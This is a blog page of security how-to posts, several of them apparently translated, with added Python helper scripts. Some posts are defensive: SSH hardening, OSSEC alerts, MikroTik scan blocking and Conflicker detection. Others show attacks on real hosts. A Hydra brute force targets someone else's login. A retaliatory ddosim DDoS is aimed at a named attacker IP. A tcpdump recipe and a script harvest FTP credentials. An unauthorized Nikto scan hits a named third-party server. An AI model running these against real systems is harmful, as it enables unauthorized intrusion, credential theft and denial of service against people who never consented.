Showing posts with label SECURITY.

Securing an SSH Server

Access to the SSH daemon needs to be locked down because sshd is one of the first things attackers go after. A few simple hardening steps:

1. Open the file /etc/ssh/sshd_config

$ sudo nano /etc/ssh/sshd_config

2. Change the options according to your hardening needs, for example:

Port 2020                  # move sshd off the default port 22 (make sure nothing else on the host is using 2020); this only cuts down on bot noise, the settings below do the real work
LoginGraceTime 30          # seconds the server waits for a client to authenticate before dropping the connection; the default is already 120 (2m), so use a lower value such as 30 if you want it shorter
PermitRootLogin no         # no direct root logins; log in as an ordinary user first and then become root with su/sudo
MaxAuthTries 3             # sshd disconnects once a client has failed authentication 3 times on one connection
AllowUsers sysadmin predi  # only the listed accounts may log in over SSH, here just sysadmin and predi; every other account is rejected even with the right password

3. Save /etc/ssh/sshd_config

4. Check the syntax, then restart the ssh service. Keep your current session open until a fresh login on the new port succeeds, so a typo in the config cannot lock you out:

$ sudo sshd -t
$ sudo /etc/init.d/ssh restart

Logging in from a Linux shell then looks like this:

# ssh sysadmin@123.231.20.xx -p 2020

Hope this helps; if anyone wants to add something, go ahead :)

note: the example was done on Ubuntu Server ;)
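A quick way to verify that the settings above really are in effect is to read sshd_config the way sshd does. The script below is an added example, not code from the original post: it mirrors sshd's parsing rules (keywords are case-insensitive, the first occurrence of a keyword wins and later duplicates are ignored, and anything after a Match header applies only to that block), fills in OpenSSH's compiled-in defaults for anything missing, and reports what deviates from the baseline in this post. The two sample configs are constructed for the demo.

```python
"""Audit an sshd_config against the hardening settings from this post.

Added example, not code from the original post. It mirrors how sshd reads
the file: keywords are case-insensitive, the FIRST occurrence of a keyword
wins, later duplicates are ignored, and everything after a 'Match' header
applies only to that block, so it is skipped here. The two sample configs
are constructed for the demo; point the script at a real file with
'python audit_sshd.py /etc/ssh/sshd_config'.
"""
import re
import sys
from typing import Dict, List

# Compiled-in OpenSSH defaults that apply when a keyword is absent.
# PermitRootLogin defaulted to 'yes' before OpenSSH 7.0 and to
# 'prohibit-password' since; either way it is not 'no'.
DEFAULTS = {
    "port": "22",
    "permitrootlogin": "prohibit-password",
    "maxauthtries": "6",
    "logingracetime": "120",
    "allowusers": "",
}

# Constructed sample: stock-looking config with one override in the wrong place.
WEAK_SAMPLE = """\
Port 22
PermitRootLogin yes
MaxAuthTries 6
MaxAuthTries 3        # ignored: sshd keeps the first value it saw
Match User backup
    PermitRootLogin no  # applies only inside the Match block
"""

# Constructed sample with the settings recommended in the post.
HARDENED_SAMPLE = """\
Port 2020
LoginGraceTime 30
PermitRootLogin no
MaxAuthTries 3
AllowUsers sysadmin predi
"""

def parse_sshd_config(text: str) -> Dict[str, str]:
    """Return the global settings as {lowercase keyword: value}, first match wins."""
    settings: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blanks
        if not line:
            continue
        # sshd accepts 'Keyword value' and 'Keyword=value'.
        m = re.match(r"^(\S+?)(?:\s+|\s*=\s*)(.+)$", line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2).strip()
        if key == "match":
            break                                # rest of file is Match-scoped
        settings.setdefault(key, value)          # first occurrence wins
    return settings

def _seconds(value: str) -> int:
    """Convert an sshd time value ('30', '30s', '2m', '1h') to seconds."""
    m = re.fullmatch(r"(\d+)([smh]?)", value.strip().lower())
    if not m:
        raise ValueError(f"bad time value: {value!r}")
    return int(m.group(1)) * {"": 1, "s": 1, "m": 60, "h": 3600}[m.group(2)]

def audit(text: str) -> List[str]:
    """Return findings against the post's baseline; an empty list means it passes."""
    eff = {**DEFAULTS, **parse_sshd_config(text)}
    findings = []
    if eff["port"] == "22":
        findings.append("Port: still the default 22")
    if eff["permitrootlogin"].lower() != "no":
        findings.append(f"PermitRootLogin: {eff['permitrootlogin']} (want no)")
    if int(eff["maxauthtries"]) > 3:
        findings.append(f"MaxAuthTries: {eff['maxauthtries']} (want 3 or fewer)")
    if _seconds(eff["logingracetime"]) > 60:
        findings.append(f"LoginGraceTime: {eff['logingracetime']} (want 60s or less)")
    if not eff["allowusers"]:
        findings.append("AllowUsers: unset, so every local account may log in")
    return findings

if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else WEAK_SAMPLE
    for f in audit(text) or ["OK: baseline met"]:
        print(f)
```

The weak sample shows the two mistakes that most often undo a hardening pass: a second `MaxAuthTries` line appended at the bottom does nothing because sshd keeps the first value, and a `PermitRootLogin no` placed under a `Match` block does not apply globally. `sshd -T` prints the effective configuration the same way and is the authoritative check on a live host.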

Brute force with Hydra on BackTrack 5

With nothing to do before heading home from the office I took the chance to fill this blog, even though this post is not very useful (maybe -_-"). Sometimes we forget a password, our own or someone else's; with the help of Hydra we can try to recover it, but success depends entirely on the wordlist you have... hehe, that is what a brute-force (really a dictionary) attack is ^_^, so keep collecting wordlists.

OK, the command is simple, like this:

root@bt:~# hydra -l admin -P /pentest/passwords/wordlists/darkc0de.lst -e ns -vV 110.137.xx.xxx http-get /

What the options do: -l admin tries the single username admin, -P reads candidate passwords from the darkc0de wordlist, -e ns additionally tries an empty password (n) and the username as the password (s), -vV prints every attempt, and http-get / selects the HTTP Basic-auth module against the path /. Every guess is a complete HTTP request, so each attempt lands in the target's access log and in front of any IDS watching it.

OK, good luck trying it... I am off home.. c u ^_^

Detecting the Conficker worm on the network with NMAP on BT 5

OK... it has been a while since I filled this blog, thanks to a busyness that is not entirely clear either -_-"

Before scanning for Conficker with BT, update BT's Nmap first by running the following:

#svn co --username=guest --password='' svn://svn.insecure.org/nmap
#cd nmap
#./configure && make
#make install

Then run Nmap in the following form (example):

#nmap -Pn -T4 -p139,445 -n -v --script=smb-check-vulns --script-args safe=1 192.168.4.0/25

where 192.168.4.0/25 is the IP range to scan, so adjust it to your own network. -Pn skips host discovery and -n skips reverse DNS, so every address in the range is probed on 139 and 445 whether or not it answers ping; safe=1 restricts the script to the checks that are not known to crash the target. On current Nmap releases smb-check-vulns has been split into separate smb-vuln-* scripts, and the Conficker test lives in smb-vuln-conficker.
OK, tested by me... have fun ^_^



thanks to: Zee Eichel (Indonesian Backtrack Team)


Sources:

1. http://www.indonesianbacktrack.or.id/?p=814
2. http://seclists.org/nmap-dev/2009/q1/870
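Reading the -v output by eye works for a /25; for a larger sweep it is easier to write the results as XML and triage them. The script below is an added example, not from the original post or the Nmap project: run the same scan with -oX conficker.xml added and feed the file to it, and it lists every host with the verdict of the Conficker check. The XML is constructed in the shape Nmap writes (host, address, hostscript and script elements); the script output text is paraphrased, and because smb-check-vulns was later split into smb-vuln-* scripts the match on the script id is kept loose.

```python
"""Triage the XML output of the Conficker sweep above.

Added example, not from the original post or the Nmap project. Re-run the
same scan with -oX conficker.xml added and feed the file to this script.
The XML below is constructed in the shape Nmap writes; the script output
text is paraphrased. The Conficker check moved from smb-check-vulns to
smb-vuln-conficker in later Nmap releases, hence the loose id match.
"""
import ipaddress
import sys
import xml.etree.ElementTree as ET
from typing import Dict, List

SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -Pn -T4 -p139,445 -n -v --script=smb-check-vulns --script-args safe=1 -oX conficker.xml 192.168.4.0/25">
  <host><status state="up"/><address addr="192.168.4.17" addrtype="ipv4"/>
    <hostscript><script id="smb-check-vulns" output="&#10;  Conficker: Likely INFECTED"/></hostscript>
  </host>
  <host><status state="up"/><address addr="192.168.4.40" addrtype="ipv4"/>
    <hostscript><script id="smb-check-vulns" output="&#10;  Conficker: Likely CLEAN"/></hostscript>
  </host>
  <host><status state="up"/><address addr="192.168.4.99" addrtype="ipv4"/>
    <hostscript><script id="smb-check-vulns" output="&#10;  Conficker: UNKNOWN; not Windows, or Windows with disabled browser service"/></hostscript>
  </host>
  <host><status state="up"/><address addr="192.168.4.120" addrtype="ipv4"/></host>
</nmaprun>
"""

def conficker_verdicts(xml_text: str) -> Dict[str, str]:
    """Map each scanned host to 'infected', 'clean', 'unknown' or 'not-checked'."""
    verdicts: Dict[str, str] = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr = next((a.get("addr") for a in host.iter("address")
                     if a.get("addrtype") == "ipv4"), None)
        if addr is None:
            continue
        verdict = "not-checked"          # ports closed/filtered or script did not run
        for script in host.iter("script"):
            sid = script.get("id", "")
            if "conficker" not in sid and "smb-check-vulns" not in sid:
                continue
            out = script.get("output", "").upper()
            if "INFECTED" in out:
                verdict = "infected"
            elif "CLEAN" in out:
                verdict = "clean"
            else:
                verdict = "unknown"       # e.g. not Windows, or Browser service off
        verdicts[addr] = verdict
    return verdicts

def infected_hosts(xml_text: str) -> List[str]:
    """Just the addresses that need isolating and cleaning."""
    return sorted((ip for ip, v in conficker_verdicts(xml_text).items() if v == "infected"),
                  key=ipaddress.ip_address)

if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_XML
    for ip, verdict in sorted(conficker_verdicts(text).items(),
                              key=lambda kv: ipaddress.ip_address(kv[0])):
        print(f"{ip:15} {verdict}")
```

The "unknown" and "not-checked" buckets matter as much as the hits: a host that did not expose 445 to the scanner, or is not Windows, has simply not been tested, so do not read a short infected list as a clean network.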




IDS with OSSEC HIDS

Implementing an IDS (intrusion detection system) on Linux using OSSEC HIDS.
OSSEC HIDS is a package that monitors a system for activity considered threatening (attacks), logs it, and can alert the system administrator by e-mail.

OSSEC runs on multiple platforms, so adapt the steps to the operating system you use; what follows is the installation and configuration on Linux, specifically Ubuntu Server 11.04.

1. Make sure the basic build packages are present on Ubuntu; to install them:

$ sudo apt-get install build-essential

2. Download the latest OSSEC release, at the time of writing 2.6, and compare it against the checksum published on ossec.net before building it:

$ wget http://www.ossec.net/files/ossec-hids-2.6.tar.gz

3. Extract it:

$ tar -xzvf ossec-hids-2.6.tar.gz

4. Enter the extracted directory, run install.sh as root and follow the prompts it gives.

$ cd ossec-hids-2.6

$ sudo ./install.sh

The output will look more or less like this ^_^:

----------

** Para instalação em português, escolha [br].
** Fur eine deutsche Installation wohlen Sie [de].
** For installation in English, choose [en].
** Per l'installazione in Italiano, scegli [it].
** Aby instalowac w jezyku Polskim, wybierz [pl].
** Türkçe kurulum için seçin [tr].
(en/br/de/it/pl/tr) [en]: en
OSSEC HIDS v0.8 Installation Script - http://www.ossec.net

You are about to start the installation process of the OSSEC HIDS.
You must have a C compiler pre-installed in your system.
If you have any questions or comments, please send an e-mail
to dcid@ossec.net (or daniel.cid@gmail.com).

- System: Linux diana 2.6.15-25-k7
- User: root - Host: xpredator


-- Press ENTER to continue or Ctrl-C to abort. --


1- What kind of installation do you want (server, agent, local or help)? local
- Choose where to install the OSSEC HIDS [/var/ossec]:
3- Configuring the OSSEC HIDS.

3.1- Do you want e-mail notification? (y/n) [y]: y
- What's your e-mail address? emailkita@email.com
- What's your SMTP server ip/host? your smtp server address (localhost)

3.2- Do you want to run the integrity check daemon? (y/n) [y]: y

- Running syscheck (integrity check daemon).

3.3- Do you want to run the rootkit detection engine? (y/n) [y]: y

- Running rootcheck (rootkit detection).

3.4- Active response allows you to execute a specific
command based on the events received. For example,
you can block an IP address or disable access for
a specific user.
More information at:

http://www.ossec.net/en/manual.html#active-response

- Do you want to enable active response? (y/n) [y]: y

- Active response enabled.

- By default, we can enable the host-deny and the
firewall-drop responses. The first one will add
a host to the /etc/hosts.deny and the second one
will block the host on iptables (if linux) or on
ipfilter (if Solaris, FreeBSD or NetBSD).
- They can be used to stop SSHD brute force scans,
portscans and some other forms of attacks. You can
also add them to block on snort events, for example.

- Do you want to enable the firewall-drop response? (y/n) [y]: y

- firewall-drop enabled (local) for levels >= 6

- Default white list for the active response:

- 192.168.2.1

- Do you want to add more IPs to the white list? (y/n)? [n]: n

3.6- Setting the configuration to analyze the following logs:

-- /var/log/messages
-- /var/log/auth.log
-- /var/log/syslog
-- /var/log/mail.info
-- /var/log/apache2/error.log (apache log)
-- /var/log/apache2/access.log (apache log)

- If you want to monitor any other file, just change
the ossec.conf and add a new localfile entry.
Any questions about the configuration can be answered
by visiting us online at http://www.ossec.net .

--- Press ENTER to continue ---
- Unknown system. No init script added.
- Configuration finished properly.

- To start OSSEC HIDS:

/var/ossec/bin/ossec-control start

- To stop OSSEC HIDS:

/var/ossec/bin/ossec-control stop

- The configuration can be viewed or modified at /var/ossec/etc/ossec.conf

Thanks for using the OSSEC HIDS.
If you have any question, suggestion or if you find any bug,
contact us at contact@ossec.net or using our public maillist at
ossec-list@ossec.net
(http://mailman.underlinux.com.br/mailman/listinfo/ossec-list).

More information can be found at http://www.ossec.net

--- Press ENTER to finish (maybe more information bellow). ---

/etc/init.d/ossec start

(if the installer could not add an init script, as in the transcript above, use /var/ossec/bin/ossec-control start instead)

Here is a (real) alert as it arrived in my mailbox:

----

OSSEC HIDS Notification.

2011 Aug 01 06:49:06

Received From: xpredator->/var/log/auth.log
Rule: 5551 fired (level 10) -> "Multiple failed logins in a small period of time."
Portion of the log(s):

Aug 1 06:49:04 xpredator sshd[31563]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.228.197.134 user=root
Aug 1 06:48:55 xpredator sshd[31491]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.228.197.134 user=root
Aug 1 06:48:45 xpredator sshd[31435]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.228.197.134 user=root
Aug 1 06:48:35 xpredator sshd[31426]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.228.197.134 user=root
Aug 1 06:48:26 xpredator sshd[31358]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.228.197.134 user=root
Aug 1 06:48:16 xpredator sshd[31302]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.228.197.134 user=root
Aug 1 06:48:07 xpredator sshd[31295]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.228.197.134 user=root
Aug 1 06:47:58 xpredator sshd[31249]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.228.197.134 user=root


--END OF NOTIFICATION



OSSEC HIDS Notification.
2011 Aug 01 06:49:08

Received From: xpredator->/var/log/auth.log
Rule: 5720 fired (level 10) -> "Multiple SSHD authentication failures."
Portion of the log(s):

Aug 1 06:49:06 xpredator sshd[31563]: Failed password for root from 122.228.197.134 port 59870 ssh2
Aug 1 06:48:57 xpredator sshd[31491]: Failed password for root from 122.228.197.134 port 59156 ssh2
Aug 1 06:48:47 xpredator sshd[31435]: Failed password for root from 122.228.197.134 port 58373 ssh2
Aug 1 06:48:37 xpredator sshd[31426]: Failed password for root from 122.228.197.134 port 57604 ssh2
Aug 1 06:48:28 xpredator sshd[31358]: Failed password for root from 122.228.197.134 port 56851 ssh2
Aug 1 06:48:18 xpredator sshd[31302]: Failed password for root from 122.228.197.134 port 56104 ssh2
Aug 1 06:48:09 xpredator sshd[31295]: Failed password for root from 122.228.197.134 port 55355 ssh2
Aug 1 06:47:59 xpredator sshd[31249]: Failed password for root from 122.228.197.134 port 54609 ssh2

--END OF NOTIFICATION
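The second alert is a frequency rule: it fires when the same decoded event repeats often enough from one source inside a time window. The script below is an added example, not OSSEC code, that reproduces that logic over the eight sshd lines from the alert above plus two constructed lines that must not count. The thresholds, 8 failures within 120 seconds, are assumed to mirror OSSEC rule 5720; check the frequency and timeframe attributes in your sshd_rules.xml for the exact values, and note that syslog lines carry no year, so one is assumed.

```python
"""Sliding-window detection of SSH password brute force, the logic behind
the "Multiple SSHD authentication failures" alert above.

Added example, not OSSEC code. The thresholds (8 failures from one source
within 120 seconds) are assumed to mirror OSSEC rule 5720. The sample input
is the eight sshd lines from the alert plus two constructed lines.
"""
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Deque, Dict, Iterable, List, Tuple

FREQUENCY = 8          # failures needed...
TIMEFRAME = 120        # ...within this many seconds (assumed, as in rule 5720)
ASSUMED_YEAR = 2011    # syslog lines have no year; the alert above is from 2011

FAILED_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

SAMPLE_LOG = """\
Aug 1 06:49:06 xpredator sshd[31563]: Failed password for root from 122.228.197.134 port 59870 ssh2
Aug 1 06:48:57 xpredator sshd[31491]: Failed password for root from 122.228.197.134 port 59156 ssh2
Aug 1 06:48:47 xpredator sshd[31435]: Failed password for root from 122.228.197.134 port 58373 ssh2
Aug 1 06:48:37 xpredator sshd[31426]: Failed password for root from 122.228.197.134 port 57604 ssh2
Aug 1 06:48:28 xpredator sshd[31358]: Failed password for root from 122.228.197.134 port 56851 ssh2
Aug 1 06:48:18 xpredator sshd[31302]: Failed password for root from 122.228.197.134 port 56104 ssh2
Aug 1 06:48:09 xpredator sshd[31295]: Failed password for root from 122.228.197.134 port 55355 ssh2
Aug 1 06:47:59 xpredator sshd[31249]: Failed password for root from 122.228.197.134 port 54609 ssh2
Aug 1 06:47:30 xpredator sshd[31201]: Accepted publickey for sysadmin from 192.168.2.1 port 50122 ssh2
Aug 1 06:40:00 xpredator sshd[31100]: Failed password for predi from 192.168.2.1 port 50010 ssh2
"""
# The last two lines are constructed: a successful login (never matches) and a
# single typo from the whitelisted admin host (matches, but stays below threshold).

def parse_failures(lines: Iterable[str]) -> List[Tuple[datetime, str, str]]:
    """Extract (time, source ip, user) for every failed-password line, oldest first."""
    events = []
    for line in lines:
        m = FAILED_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(" ".join(m["ts"].split()), "%b %d %H:%M:%S")
        events.append((ts.replace(year=ASSUMED_YEAR), m["ip"], m["user"]))
    events.sort()   # the alert text lists newest first; detection needs time order
    return events

def detect_bruteforce(lines: Iterable[str], frequency: int = FREQUENCY,
                      timeframe: int = TIMEFRAME) -> List[dict]:
    """One alert per source IP, raised the first time it reaches `frequency`
    failures inside a `timeframe`-second window (how a frequency rule fires)."""
    window: Dict[str, Deque[datetime]] = defaultdict(deque)
    fired = set()
    alerts = []
    for ts, ip, user in parse_failures(lines):
        q = window[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > timeframe:   # slide the window
            q.popleft()
        if len(q) >= frequency and ip not in fired:
            fired.add(ip)
            alerts.append({"ip": ip, "user": user, "count": len(q),
                           "first": q[0], "last": ts})
    return alerts

if __name__ == "__main__":
    for a in detect_bruteforce(SAMPLE_LOG.splitlines()):
        print(f"{a['ip']}: {a['count']} failed logins as {a['user']} "
              f"between {a['first']:%H:%M:%S} and {a['last']:%H:%M:%S}")
```

The eight attempts in the alert span 67 seconds, so the eighth one trips the rule; at ten-second spacing the same attacker would need only a slightly slower loop (one attempt every 16 seconds) to stay under 8-in-120 forever, which is why the PermitRootLogin and AllowUsers settings from the first post matter more than the detection threshold.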

=============

DDoS on BT 5

The IDS (intrusion detection system) alerted that an attack had been attempted against one of my servers, and I found that the IP came from China.

I responded by looking up and scanning that host in return, and not content with that I tried a DDoS with DDOSIM against one of its open ports that looked like a worthwhile target to me. ^_^

Here are the steps:

1. Download ddosim from http://sourceforge.net/projects/ddosim/files/ddosim-0.2.tar.gz

2. Extract it: #tar -zxvf ddosim-0.2.tar.gz

3. Then run:

#cd ddosim

#./configure

#make

#make install

4. ddosim is ready to use; here is its usage text:

-------------------

# DDOSIM: Layer 7 DDoS Simulator v0.2
# Author: Adrian Furtuna


Usage: ./ddosim
-d IP Target IP address
-p PORT Target port
[-k NET] Source IP from class C network (ex. 10.4.4.0)
[-i IFNAME] Output interface name
[-c COUNT] Number of connections to establish
[-w DELAY] Delay (in milliseconds) between SYN packets
[-r TYPE] Request to send after TCP 3-way handshake. TYPE can be HTTP_VALID or HTTP_INVALID or SMTP_EHLO
[-t NRTHREADS] Number of threads to use when sending packets ( default 1)
[-n] Do not spoof source address (use local address)
[-v] Verbose mode (slower)
[-h] Print this help message

-------------------------------------------
Example:
# ddosim -d 122.228.197.134 -p 80 -r HTTP_INVALID -w 2 -c 5 -t 5

Here -r HTTP_INVALID sends a malformed HTTP request on each connection once the TCP handshake completes, -w 2 waits 2 ms between SYNs, -c 5 opens five connections and -t 5 spreads the sending over five threads. Without -n the source addresses are spoofed, and ddosim can only complete a handshake from a spoofed address if the replies are routed back to the machine running it; on an ordinary network add -n or choose a -k range that actually routes to you.

Have fun ^_^



notes:
* make sure the libnet0-dev library is installed on your system,
* the sin is yours alone if you use this on other people :p


Tcpdump against port 21 (FTP)

Run tcpdump on your machine to capture the usernames and passwords sent to an FTP server:

#tcpdump -q -i eth0 -n -A port 21 > target.txt

After a while press Ctrl+C to stop sniffing; tcpdump then reports how many packets it captured. You only see traffic that actually crosses your interface: your own sessions, or other hosts' sessions if you are on a shared segment, on a mirrored switch port or otherwise in the path.

To filter so that only the username and password are shown, run:

#grep -a -E 'USER|PASS' target.txt

(the FTP command is PASS, not PASSWORD, so a grep for PASSWORD never matches anything; -a makes grep treat the file as text despite the binary header bytes that -A prints.)

If you are lucky, the username and password will be displayed. FTP sends both in cleartext, which is the whole point: anything that can see the control channel can read them, so use SFTP or FTPS instead of plain FTP.

OK, good luck ;)
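The grep above shows the commands but not which PASS belongs to which USER once several sessions overlap. The script below is an added example, not from the original post: it walks a tcpdump -A text dump packet by packet, keeps only client-to-server packets (destination port 21), and pairs each PASS with the USER seen earlier on the same connection. The dump is constructed to look like tcpdump -A output (a header line per packet, then the packet bytes as ASCII with the IP/TCP header rendered as dots); the header line layout varies slightly between tcpdump versions, so the header regex is an assumption to check against your own capture.

```python
"""Pull FTP USER/PASS pairs out of a 'tcpdump -q -n -A port 21' text dump.

Added example, not from the original post. Pairs each PASS with the USER
from the same client connection and ignores server replies. SAMPLE_DUMP is
constructed; the header-line regex is an assumption about tcpdump's format.
"""
import re
import sys
from typing import Dict, List, Optional, Tuple

HEADER_RE = re.compile(
    r"^\d{2}:\d{2}:\d{2}\.\d+ IP (\d+\.\d+\.\d+\.\d+)\.(\d+) > (\d+\.\d+\.\d+\.\d+)\.(\d+):"
)
# FTP commands are case-insensitive; the argument runs to the end of the line
# because tcpdump -A prints the trailing CRLF as a line break.
CMD_RE = re.compile(r"(USER|PASS) (\S+)\s*$", re.IGNORECASE)

SAMPLE_DUMP = """\
06:51:02.114251 IP 192.168.4.23.51844 > 192.168.4.9.21: tcp 0
E..4..@.@.............
06:51:02.120007 IP 192.168.4.9.21 > 192.168.4.23.51844: tcp 20
E..H..@.@.........220 FTP server ready
06:51:05.301129 IP 192.168.4.23.51844 > 192.168.4.9.21: tcp 12
E..@..@.@.........USER alice
06:51:05.302340 IP 192.168.4.9.21 > 192.168.4.23.51844: tcp 34
E..V..@.@.........331 Please specify the password.
06:51:06.900001 IP 10.0.0.5.40021 > 192.168.4.9.21: tcp 11
E..?..@.@.........user bob
06:51:08.771904 IP 192.168.4.23.51844 > 192.168.4.9.21: tcp 16
E..D..@.@.........PASS Wint3r2011!
06:51:08.773115 IP 192.168.4.9.21 > 192.168.4.23.51844: tcp 23
E..K..@.@.........230 Login successful.
06:51:09.400000 IP 10.0.0.5.40021 > 192.168.4.9.21: tcp 13
E..A..@.@.........PASS s3cret
06:51:20.008812 IP 10.0.0.7.40100 > 192.168.4.9.21: tcp 14
E..B..@.@.........PASS orphan
"""

def extract_ftp_credentials(dump_text: str, ftp_port: int = 21) -> List[Dict[str, str]]:
    """Return one record per completed USER/PASS pair, keyed by client connection."""
    creds: List[Dict[str, str]] = []
    pending: Dict[Tuple[str, str], str] = {}        # connection -> username awaiting PASS
    current: Optional[Tuple[str, str]] = None       # connection of the packet being read
    for line in dump_text.splitlines():
        h = HEADER_RE.match(line)
        if h:
            src, sport, dst, dport = h.groups()
            # Only client->server packets carry commands; server replies are skipped.
            current = (f"{src}:{sport}", f"{dst}:{dport}") if int(dport) == ftp_port else None
            continue
        if current is None:
            continue
        m = CMD_RE.search(line)
        if not m:
            continue
        cmd, arg = m.group(1).upper(), m.group(2)
        if cmd == "USER":
            pending[current] = arg
        elif cmd == "PASS" and current in pending:  # a PASS with no USER is noise
            creds.append({"client": current[0], "server": current[1],
                          "user": pending.pop(current), "password": arg})
    return creds

if __name__ == "__main__":
    text = open(sys.argv[1], errors="replace").read() if len(sys.argv) > 1 else SAMPLE_DUMP
    for c in extract_ftp_credentials(text):
        print(f"{c['client']} -> {c['server']}: {c['user']} / {c['password']}")
```

Run it as `python ftpcreds.py target.txt` on the file the tcpdump command above produces. For anything more than a one-off, capture with `tcpdump -w` instead and parse the pcap, so that passwords containing bytes tcpdump renders as dots are not lost.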



Nikto part I

One of the well-known server scanning programs is Nikto (cirt.net); below the author gives an example of using it to scan a web server. By the way, apologies to the server owner, I was only fooling around and did not damage your system; if there are other intruders in your system I had nothing to do with them ^_^.

1. The most basic Nikto scan

root@bt:/pentest/web/nikto# perl nikto.pl -h jehz.com.my
- Nikto v2.1.4
---------------------------------------------------------------------------
+ Target IP: 204.45.108.42
+ Target Hostname: jehz.com.my
+ Target Port: 80
+ Start Time: 2011-08-02 21:19:39
---------------------------------------------------------------------------
+ Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
+ Root page / redirects to: http://jehz.com.my/cgi-sys/suspendedpage.cgi
+ mod_ssl/2.2.19 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ Number of sections in the version string differ from those in the database, the server reports: openssl/0.9.8e-fips-rhel5 while the database has: 1.0.0.100. This may cause false positives.
+ OpenSSL/0.9.8e-fips-rhel5 appears to be outdated (current is at least 1.0.0d). OpenSSL 0.9.8r is also current.
+ FrontPage/5.0.2.2635 appears to be outdated (current is at least 5.0.4.3) (may depend on server version)
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ FrontPage - http://www.insecure.org/sploits/Microsoft.frontpage.insecurities.html
+ mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
+ /cgi-sys/formmail.pl: Many versions of FormMail have remote vulnerabilities, including file access, information disclosure and email abuse. FormMail access should be restricted as much as possible or a more secure solution found.
+ /cgi-sys/guestbook.cgi: May allow attackers to execute commands as the web daemon.
+ OSVDB-27071: /phpimageview.php?pic=javascript:alert(8754): PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
--- cut ---

From the output above the target has several issues, and more followed further down. Bear in mind that most of these are banner matches: the "appears to be outdated" lines and the CVE-2002-0082 entry come from comparing version strings (Nikto itself warns "may depend on server version", and mod_ssl 2.2.19 is the module bundled with Apache 2.2, a different lineage from the mod_ssl 2.8.x series for Apache 1.3 that the CVE concerns, so that one is a false positive). The root page also redirects to suspendedpage.cgi, so the account is suspended. Treat each item as a lead to verify, not a confirmed vulnerability.
2. Scanning a target on a specific port

root@bt:/pentest/web/nikto# perl nikto.pl -h 204.45.108.42 -p 443

- Nikto v2.1.4
---------------------------------------------------------------------------
+ Target IP: 204.45.108.42
+ Target Hostname: bliss.theservergroup.info
+ Target Port: 443
+ Start Time: 2011-08-02 22:33:56
---------------------------------------------------------------------------
+ Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635

3. Scanning several specific ports:

root@bt:/pentest/web/nikto# perl nikto.pl -h 204.45.108.42 -p 80,88,443,22,21

- Nikto v2.1.4
---------------------------------------------------------------------------
+ No web server found on bliss.theservergroup.info:88
---------------------------------------------------------------------------

Hehe, that is it for now; combining it with other tools can wait... besides, people are reciting the Quran and here I am looking at things I shouldn't... it might ruin my fast ^_^.

Anti Port Scanning on MikroTik

Port scanning a server is one of the techniques attackers/intruders use to look for security holes they can exploit.

On MikroTik we can detect this kind of probing and at the same time block the attacker's source IP. In the script below, psd=21,3s,3,1 is the port-scan detector: WeightThreshold 21, DelayThreshold 3s, LowPortWeight 3 for privileged ports (<=1024) and HighPortWeight 1 for the rest, so a source that touches seven low ports, or twenty-one high ports, within 3 seconds of each other gets listed. The tcp-flags rules match the flag combinations that nmap's stealth scans produce (a listed flag must be set, a !flag must be clear, flags not mentioned are ignored), and the last rule drops everything from a listed address for the two weeks the entry lives. Two caveats: chain=input only covers traffic aimed at the router itself, so repeat the rules in chain=forward if hosts behind it are to be protected; and put an accept rule for your management addresses above these, otherwise a scan from your own workstation locks you out. Here is the script:

#---- script ---

/ip firewall filter add chain=input protocol=tcp psd=21,3s,3,1 action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w comment="Port scanners to list " disabled=no
/ip firewall filter add chain=input protocol=tcp tcp-flags=fin,!syn,!rst,!psh,!ack,!urg action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w comment="NMAP FIN Stealth scan"
/ip firewall filter add chain=input protocol=tcp tcp-flags=fin,syn action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w comment="SYN/FIN scan"
/ip firewall filter add chain=input protocol=tcp tcp-flags=syn,rst action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w comment="SYN/RST scan"
/ip firewall filter add chain=input protocol=tcp tcp-flags=fin,psh,urg,!syn,!rst,!ack action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w comment="FIN/PSH/URG scan"
